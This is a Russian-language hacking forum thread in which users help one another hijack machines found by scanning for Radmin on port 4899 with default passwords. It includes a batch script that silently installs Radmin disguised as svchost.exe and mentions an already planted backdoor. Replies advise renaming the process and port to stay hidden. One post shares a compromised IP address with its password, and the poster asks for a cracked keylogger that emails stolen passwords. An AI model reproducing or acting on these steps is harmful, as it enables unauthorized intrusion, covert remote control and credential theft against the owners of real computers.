дело в том что я сканировал IP на 4899 порт,нашел много открытых пароли по стандарту 1-8 так вот суть проблемы в том , что мне надо данный радмин удалить и залить свой не видемый.Радмин этот я удалял после чего заливал свой запускал при коннекте писало нет соединения и так постоянно. Как поступить?Прошу вас о помощи Заранее благодарен
Пиши как удалял, как потом свой заливал (через чего). Невидимый - это что имеется ввиду иконка в трее или в процессах невидимый. Тут вопросов больше чем ответов пока...
удалял через установку и удаление всеровно значек в треи числился я в реестре удалил его значка не было заранее был залит бекдор xcontrol с помощью него свой заливал и запускал да невидимый значит не в треи ни в диспетчере нету =)
да не видно, свой я запустил как и писал через xcontrol и не коннектит вообще =((( выдает следуещее : Соединение с 88.204.71.152 Ошибка TCP/IP или соединение закрыто.
Короче поступаешь так: 1.Устанавливаешь свой радмин. 2.Удаляешь чужой радин. 3.конектишься. Это же все злементарно
ути умник какой xDD свой устанавливаю вылетает Ошибка TCP/IP или соединение закрыто. все =)) даже не успел удалить старый как такое вылетело Хотя если ставить радмин мой через шелл то все нормально тоесть я сделал выводы что каким то образом старый радмин мешает но как быть в этой ситтуации?
Кинь сюда батник которым инсталишь. И короче чувак хорош дедов тем более не своих тырить их же люди в разных целях используют, а ты нам подсираешь. Я сам когда ломаю серв всегда ставлю пароль 1-8. Потому-что о людях забочусь(тоесть о нас хакерах). Так что хорош фигней страдать. Или мы можем созлиться Ну ты понял ДА?
Это твой Code: @echo off rename core.dll svchost.exe rename vmode.dll admdll.dll rename vdrv.srt raddrv.dll REG delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll" copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll" reg import settings.reg "%SYSTEMROOT%/svchost.exe" /install /silence "%SYSTEMROOT%/svchost.exe" /start А ты уверен что файлы у тебя скопированы в папку windows?
Да действительно странная мессага Code: Соединение с 88.204.71.152 Ошибка TCP/IP или соединение закрыто Сам пробовал коннектился
А радмин версия какая может просто иконку в три отрубить??? И если свой кидаеш процес переименуй и порт другой паставь.
ребят я очень далеко от вас живу очень )) дай бог чтоб получился коннект а так без проблем 88.204.20.82 12345678 И вот еще ктонибудь может кейлоггер посоветовать хороший чтобы на мыло пароли высылал а еще лучше что то типо Lan_keylogger только бы с кряком ) заранее благодарствую
чувак для этого есть MPR Ты походу полохо усвоил что такие инет и TCP Да я подконнектился к твоему ип Блин пинг больно большой